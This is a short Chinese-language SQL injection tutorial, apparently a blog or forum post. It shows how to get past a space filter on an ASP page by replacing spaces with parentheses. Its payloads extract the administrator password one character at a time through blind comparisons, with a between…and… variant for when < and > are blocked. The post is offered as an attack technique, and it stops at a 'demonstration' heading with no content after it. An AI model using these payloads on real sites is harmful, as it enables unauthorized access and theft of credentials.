使用“()”繞過(guò)空格繼續(xù)注射

舉個(gè)例 子說(shuō)一下， 我們得到一個(gè)注入點(diǎn)：jmdcw.asp?name=aa'and 1=1 and ''='， 如果替換其中的1=1為查詢管理員的密碼的語(yǔ)句：

(select asc(mid(pass,1,1)) from [name] where id=1)>49

如何用空格呢？其實(shí)可以寫成這樣的：

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='

如果屏蔽了<和>符號(hào)， 則用between…and…， 語(yǔ)句是：

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='

對(duì)于中間應(yīng)該出現(xiàn)空格的地方， 用()進(jìn)行替換， 不過(guò)， 對(duì)于很復(fù)雜的SQL語(yǔ)句就不太好用了。 上面說(shuō)到的是字符型的， 如果是數(shù)值型， 可以在id=1后加一個(gè)括號(hào)， 不過(guò)這個(gè)我沒有測(cè)試，

比如:jmdcw.asp?id=(1)and(select.....)， 應(yīng)該是可行的吧？

實(shí)例演示：